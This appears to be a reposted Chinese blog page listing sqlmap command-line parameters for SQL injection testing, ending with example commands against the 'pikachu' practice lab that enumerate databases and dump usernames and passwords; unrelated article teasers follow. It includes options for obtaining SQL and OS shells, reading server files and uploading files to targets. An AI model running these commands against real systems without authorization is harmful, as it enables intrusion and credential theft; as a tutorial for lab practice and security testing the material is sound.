SQLMAP使用参数seo优化

SQLMAP使用参数

news/2024/9/27 5:43:41

get型常用参数

-u：指定注入的URL   sqlmap -u URL
--dbs：爆出所有数据库 sqlmap -u URL --dbs
--dbms：指定数据库类型 sqlmap -u URL --dbms=mysql
--users：查看数据库的所有用户 sqlmap -u URL --users
--current-user：查看数据库当前用户 sqlmap -u URL --current-user
--current-db：查看网站当前数据库 sqlmap -u URL --current-db
--is-dba：判断当前用户是否有管理员权限 sqlmap -u URL --is-dba[11:57:52] [INFO] testing if current user is DBA[11:57:52] [INFO] fetching current usercurrent user is DBA: True
--roles：列出数据库所有管理员角色，仅适用于oracle数据库 sqlmap -u URL --roles
--tables：爆出所有数据表 sqlmap -u URL -D 数据库名 --tables
--columns：爆出数据库表所有列 sqlmap -u URL -D 数据库名 -T 表名 --columns 
--dump：爆出数据库中列中的所有数据 sqlmap -u URL -D 数据库名 -T 表名 -C 列名 --dump
--dump-all：爆出数据库中所有的数据 sqlmap -u URL -D 数据库名 -T 表名 --dump-all
--sql-shell：获取数据库shell  sqlmap -u URL --sql-shell
--os-shell：获取服务器shell  sqlmap -u URL --os-shell
--file-read：读取服务器文件  sqlmap -u URL --file-read "文件路径及名称"
--file-write 本地文件 --file-dist 目标文件路径及名称：将本地文件上传至目标服务器
--time-sec=2：延时注入 sqlmap -u URL --time-sec=2
--batch：探测过程中不进行询问，一律选择默认
-m：如果有多个url地址，可以把多个url保存成一个文本文件，-m可以加载文本文件逐个扫描

post型常用参数

-r：指定POST数据文件  sqlmap -r post.txt
--data：这种不需要将数据进行保存，只需要将post数据复制下来即可 sqlmap -u URL --data="post数据"
--forms：自动搜索表单的方式 sqlmap -u URL --forms
--cookie="抓取的cookie"：测试cookie字段
--param-del：参数拆分字符，当GET型或POST型需要用其他字符分割测试参数的时候需要用到此参数，sqlmap -r post.txt --data="query=foorbar;id=1" --param-del
--referer：在请求中伪造http中的referer，当level参数设定为3或者3以上的时候会尝试对referer注入
--headers：增加额外的http头
--proxy：指定代理地址
-p：指定测试参数

汇总

-u 指定目标URL (可以是http协议也可以是https协议)
-d 连接数据库
--dbs 列出所有的数据库
--current-db 列出当前数据库
--tables 列出当前的表
--columns 列出当前的列
-D 选择使用哪个数据库
-T 选择使用哪个表
-C 选择使用哪个列
--dump 获取字段中的数据
--batch 自动选择
yes--smart 启发式快速判断，节约浪费时间
--forms 尝试使用post注入
-r 加载文件中的HTTP请求（本地保存的请求包txt文件）
-l 加载文件中的HTTP请求（本地保存的请求包日志文件）
-g 自动获取Google搜索的前一百个结果，对有GET参数的URL测试
-o 开启所有默认性能优化--tamper 调用脚本进行注入
-v 指定sqlmap的回显等级
--delay 设置多久访问一次
--os-shell 获取主机shell，一般不太好用，因为没权限
-m 批量操作-c 指定配置文件，会按照该配置文件执行动作
-data data指定的数据会当做post数据提交
-timeout 设定超时时间
--level 设置注入探测等级
--risk 风险等级
--identify-waf 检测防火墙类型
--param-del="分割符" 设置参数的分割符
--skip-urlencode 不进行url编码
--keep-alive 设置持久连接，加快探测速度
--null-connection 检索没有body响应的内容，多用于盲注
--thread 最大为10 设置多线程

示例
探测注入点
sqlmap -r 1.txt --batch

爆库
sqlmap -r 1.txt --dbs --batch

爆表
sqlmap -r 1.txt -D "pikachu" -tables --batch

爆字段名
sqlmap -r 1.txt -D "pikachu" -T "users" --columns --batch

爆数据
sqlmap -r 1.txt -D "pikachu" -T "users" -C "username,password" --batch --dump

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.ryyt.cn/news/46045.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈，一经查实，立即删除！

SQL去重

记得很多年前，有个测试妹子找到我：强哥，我这个表数据重复了，怎么把重复的数据删掉呀？类似的需要将数据去重的场景，在实际工作中还是比较常见的。今天我们就来说说，使用SQL语句来去重，有哪些常见的方法。假如我们有一张student表：create table student( id int, …

Docker 部署 YApi 记录

最近想在 linux 环境部署YApi 对接口文档进行管理，只不过基于官方的部署方式，需要npm 的配置，而且中间踩了很多坑比如 YApi版本， Node js版本......想着还是使用 Docker 部署吧，找到了这位大佬的部署方式： https://www.jianshu.com/p/a97d2efb23c5 基于大佬的配置，终于…

销讯通CRM系统如何确保拜访数据的真实有效

销讯通CRM系统如何确保并检查拜访过程数据的真实性，是一个值得深入探讨的课题。01 在信息化高度发达的今天，我们拥有GPS定位、AI人脸识别等先进技术，这些技术无疑为数据的真实有效性提供了强有力的保障。在销讯通客户关系管理系统中，我们利用正也科技的前沿技术创新，通过智…

WPF/C#：数据绑定到方法

本文介绍了WPF中如何数据绑定到方法。在WPF Samples中有一个关于数据绑定到方法的Demo，该Demo结构如下：运行效果如下所示：来看看是如何实现的。先来看下MainWindow.xaml中的内容： <Window.Resources><ObjectDataProvider ObjectType="{x:Type local:Tempera…

重磅！2024年最新影响因子正式发布，附Excel下载

大家好，这里是专注表观组学十余年，领跑多组学科研服务的易基因。激动人心的时刻终于来了，2024年影响因子已全面发布！废话不多说，大家一起来看看最新的发布的结果吧！神刊：CA-A CANCER JOURNAL FOR CLINICIANS 毫无疑问，最高分必然是它，今年公布最新影响因子为503.1。…

MestReNova14.0中文版安装教程

MestReNova 14是一款专业级的核磁共振（NMR）与质谱（MS）数据分析软件，专注于化合物结构解析和验证。该软件以卓越的谱图处理能力和智能化算法为核心，提供自定义参数调整、自动峰识别、精准积分、耦合常数计算等功能。支持多种仪器数据格式导入，可高效处理一维至四维NMR谱图…

Mybatis XML文件中，对java.util.Date对象的值到转换为执行SQL进行比较所做的隐式行为分析。

Mybatis XML文件SQL对于Date类型比较分析本次分析了mybatis的mapper XML文件，sql的where子句中使用java.util.Date进行比较进行分析。假设使用的是以下sql语句。 select * from xxx where create_time > 2024-06-20 20:38:38在mybatis中，会将java.util.Date对象的值转为j…

工作中的大分母规律简述

因为在工作之中，我总是遇到这种现象，姑且称此现象为大分母规律。

SQLMAP使用参数

相关文章